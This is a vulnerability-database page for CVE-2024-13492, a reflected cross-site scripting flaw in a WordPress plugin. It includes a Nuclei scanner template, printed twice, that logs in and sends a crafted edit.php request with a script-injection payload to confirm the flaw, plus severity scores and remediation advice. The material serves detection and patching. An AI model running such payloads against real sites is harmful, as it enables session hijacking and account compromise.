Guten Free Options - Cross Site Scripting

CVE-2024-13492

Verified

Description

Guten Free Options WordPress plugin <= 0.9.5 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in high privilege users' browsers, exploit requires victim to click malicious link.

Severity

Medium

CVSS Score

6.1

Exploit Probability

Affected Product

guten_free_options

Published Date

February 6, 2026

Template Author

sourabh-sahu

CVE-2024-13492.yaml

id: CVE-2024-13492

info:
  name: Guten Free Options - Cross Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Guten Free Options WordPress plugin <= 0.9.5 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in high privilege users' browsers, exploit requires victim to click malicious link.
  impact: |
    Attackers can execute malicious scripts in high privilege users' browsers, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/a4a75b75-4801-4ed4-bcc6-4874ac169562/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13492
    cwe-id: CWE-79
    epss-score: 0.02463
    epss-percentile: 0.85431
    cpe: cpe:2.3:a:wordquest:guten_free_options:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wordquest
    product: guten_free_options
  tags: cve,cve2024,wordquest,guten-free-options,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=page&editor=1"></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`")
        condition: and
# digest: 490a004630440220597dbb7168ee73df09062172c3fa4a3568aed93da74f7f23aa5e90748b39989202204564e4db9100459d853251fae5b477ba9d34177b0e50e3d7fe91dfd2a93f59bf:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2024-13492

CWE ID:

cwe-79

References

https://wpscan.com/vulnerability/a4a75b75-4801-4ed4-bcc6-4874ac169562/

Remediation Steps

Update to the latest version of the plugin where the issue is fixed.

id: CVE-2024-13492

info:
  name: Guten Free Options - Cross Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Guten Free Options WordPress plugin <= 0.9.5 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in high privilege users' browsers, exploit requires victim to click malicious link.
  impact: |
    Attackers can execute malicious scripts in high privilege users' browsers, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/a4a75b75-4801-4ed4-bcc6-4874ac169562/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13492
    cwe-id: CWE-79
    epss-score: 0.02463
    epss-percentile: 0.85431
    cpe: cpe:2.3:a:wordquest:guten_free_options:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wordquest
    product: guten_free_options
  tags: cve,cve2024,wordquest,guten-free-options,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=page&editor=1"></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`")
        condition: and
# digest: 490a004630440220597dbb7168ee73df09062172c3fa4a3568aed93da74f7f23aa5e90748b39989202204564e4db9100459d853251fae5b477ba9d34177b0e50e3d7fe91dfd2a93f59bf:922c64590222798bb761d5b6d8e72950

Guten Free Options - Cross Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Guten Free Options - Cross Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps